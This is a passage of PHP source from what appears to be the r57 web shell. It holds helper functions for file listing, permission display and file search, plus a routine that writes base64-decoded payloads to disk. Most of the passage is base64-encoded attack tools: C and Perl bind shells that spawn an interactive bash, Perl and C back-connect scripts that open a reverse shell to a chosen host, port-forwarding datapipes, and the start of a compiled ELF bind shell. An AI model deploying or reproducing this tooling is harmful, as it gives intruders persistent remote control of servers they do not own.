2289            $user = @explode(":",$string);
2290            if(substr($string,0,1)!='#') array_push($users,$user[0]);
2291    }
2292   return $users;
2293 }
2294 function err($n,$txt='')
2295 {
2296 echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
2297 echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
2298 if(!empty($txt)) { echo " $txt"; }
2299 echo '</b></div></font></td></tr></table>';
2300 return null;
2301 }
2302 function perms($mode)
2303 {
2304 if (!$GLOBALS['unix']) return 0;
2305 if( $mode & 0x1000 ) { $type='p'; }
2306 else if( $mode & 0x2000 ) { $type='c'; }
2307 else if( $mode & 0x4000 ) { $type='d'; }
2308 else if( $mode & 0x6000 ) { $type='b'; }
2309 else if( $mode & 0x8000 ) { $type='-'; }
2310 else if( $mode & 0xA000 ) { $type='l'; }
2311 else if( $mode & 0xC000 ) { $type='s'; }
2312 else $type='u';
2313 $owner["read"] = ($mode & 00400) ? 'r' : '-';
2314 $owner["write"] = ($mode & 00200) ? 'w' : '-';
2315 $owner["execute"] = ($mode & 00100) ? 'x' : '-';
2316 $group["read"] = ($mode & 00040) ? 'r' : '-';
2317 $group["write"] = ($mode & 00020) ? 'w' : '-';
2318 $group["execute"] = ($mode & 00010) ? 'x' : '-';
2319 $world["read"] = ($mode & 00004) ? 'r' : '-';
2320 $world["write"] = ($mode & 00002) ? 'w' : '-';
2321 $world["execute"] = ($mode & 00001) ? 'x' : '-';
2322 if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
2323 if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
2324 if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
2325 $s=sprintf("%1s", $type);
2326 $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
2327 $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
2328 $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
2329 return trim($s);
2330 }
2331 function in($type,$name,$size,$value,$checked=0)
2332 {
2333  $ret = "<input type=".$type." name=".$name." ";
2334  if($size != 0) { $ret .= "size=".$size." "; }
2335  $ret .= "value=\"".$value."\"";
2336  if($checked) $ret .= " checked";
2337  return $ret.">";
2338 }
2339 function which($pr)
2340 {
2341 $path = ex("which $pr");
2342 if(!empty($path)) { return $path; } else { return $pr; }
2343 }
2344 function cf($fname,$text)
2345 {
2346  $w_file=@fopen($fname,"w") or err(0);
2347  if($w_file)
2348  {
2349  @fputs($w_file,@base64_decode($text));
2350  @fclose($w_file);
2351  }
2352 }
2353 function sr($l,$t1,$t2)
2354  {
2355  return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
2356  }
2357 if (!@function_exists("view_size"))
2358 {
2359 function view_size($size)
2360 {
2361  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
2362  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
2363  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
2364  else {$size = $size . " B";}
2365  return $size;
2366 }
2367 }
2368   function DirFilesR($dir,$types='')
2369   {
2370     $files = Array();
2371     if(($handle = @opendir($dir)))
2372     {
2373       while (false !== ($file = @readdir($handle)))
2374       {
2375         if ($file != "." && $file != "..")
2376         {
2377           if(@is_dir($dir."/".$file))
2378             $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
2379           else
2380           {
2381             $pos = @strrpos($file,".");
2382             $ext = @substr($file,$pos,@strlen($file)-$pos);
2383             if($types)
2384             {
2385               if(@in_array($ext,explode(';',$types)))
2386                 $files[] = $dir."/".$file;
2387             }
2388             else
2389               $files[] = $dir."/".$file;
2390           }
2391         }
2392       }
2393       @closedir($handle);
2394     }
2395     return $files;
2396   }
2397   class SearchResult
2398   {
2399     var $text;
2400     var $FilesToSearch;
2401     var $ResultFiles;
2402     var $FilesTotal;
2403     var $MatchesCount;
2404     var $FileMatschesCount;
2405     var $TimeStart;
2406     var $TimeTotal;
2407     var $titles;
2408     function SearchResult($dir,$text,$filter='')
2409     {
2410       $dirs = @explode(";",$dir);
2411       $this->FilesToSearch = Array();
2412       for($a=0;$a<count($dirs);$a++)
2413         $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
2414       $this->text = $text;
2415       $this->FilesTotal = @count($this->FilesToSearch);
2416       $this->TimeStart = getmicrotime();
2417       $this->MatchesCount = 0;
2418       $this->ResultFiles = Array();
2419       $this->FileMatchesCount = Array();
2420       $this->titles = Array();
2421     }
2422     function GetFilesTotal() { return $this->FilesTotal; }
2423     function GetTitles() { return $this->titles; }
2424     function GetTimeTotal() { return $this->TimeTotal; }
2425     function GetMatchesCount() { return $this->MatchesCount; }
2426     function GetFileMatchesCount() { return $this->FileMatchesCount; }
2427     function GetResultFiles() { return $this->ResultFiles; }
2428     function SearchText($phrase=0,$case=0) {
2429     $qq = @explode(' ',$this->text);
2430     $delim = '|';
2431       if($phrase)
2432         foreach($qq as $k=>$v)
2433           $qq[$k] = '\b'.$v.'\b';
2434       $words = '('.@implode($delim,$qq).')';
2435       $pattern = "/".$words."/";
2436       if(!$case)
2437         $pattern .= 'i';
2438       foreach($this->FilesToSearch as $k=>$filename)
2439       {
2440         $this->FileMatchesCount[$filename] = 0;
2441         $FileStrings = @file($filename) or @next;
2442         for($a=0;$a<@count($FileStrings);$a++)
2443         {
2444           $count = 0;
2445           $CurString = $FileStrings[$a];
2446           $CurString = @Trim($CurString);
2447           $CurString = @strip_tags($CurString);
2448           $aa = '';
2449           if(($count = @preg_match_all($pattern,$CurString,$aa)))
2450           {
2451             $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
2452             $this->ResultFiles[$filename][$a+1] = $CurString;
2453             $this->MatchesCount += $count;
2454             $this->FileMatchesCount[$filename] += $count;
2455           }
2456         }
2457       }
2458       $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
2459     }
2460   }
2461   function getmicrotime()
2462   {
2463     list($usec,$sec) = @explode(" ",@microtime());
2464     return ((float)$usec + (float)$sec);
2465   }
2466 $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
2467 A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
2468 GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
2469 b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
2470 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
2471 NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
2472 ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
2473 ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
2474 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
2475 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2476 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
2477 dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
2478 lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
2479 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
2480 VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
2481 JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
2482 TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
2483 lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
2484 Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
2485 Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
2486 lIENPTk47DQpleGl0IDA7DQp9DQp9";
2487 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
2488 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
2489 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
2490 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
2491 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
2492 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
2493 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
2494 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
2495 BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
2496 SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
2497 KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
2498 sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
2499 Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
2500 QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
2501 Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
2502 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
2503 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
2504 HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
2505 aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
2506 lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
2507 xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
2508 W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
2509 LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
2510 udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
2511 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
2512 iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
2513 KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
2514 gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
2515 hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
2516 iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
2517 ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
2518 vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
2519 AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
2520 QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
2521 ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
2522 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
2523 wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
2524 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
2525 MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
2526 gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
2527 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
2528 HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
2529 dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
2530 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
2531 ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
2532 E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
2533 Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
2534 NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
2535 J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
2536 CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
2537 dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
2538 gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
2539 lsZSk7DQogIHJldHVybiAwOw0KfQ==";
2540 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
2541 CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
2542 bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
2543 gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
2544 NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
2545 iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
2546 aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
2547 SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
2548 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
2549 WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
2550 CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
2551 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
2552 I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
2553 m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
2554 IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
2555 lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
2556 QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
2557 CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
2558 c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
2559 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
2560 UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
2561 DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
2562 ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
2563 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
2564 $port_bind_bd_cs="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpY